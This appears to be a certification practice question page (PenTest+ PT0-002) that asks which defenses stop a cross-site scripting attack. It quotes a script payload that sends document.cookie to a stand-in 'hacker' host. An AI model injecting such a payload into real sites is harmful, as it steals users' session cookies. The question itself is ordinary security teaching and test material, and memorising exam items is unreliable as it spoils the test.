List of questions
Related questions
Question 37 - PT0-002 discussion
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A.
Web-application firewall
B.
Parameterized queries
C.
Output encoding
D.
Session tokens
E.
Input validation
F.
Base64 encoding
Your answer:
0 comments
Sorted by
Leave a comment first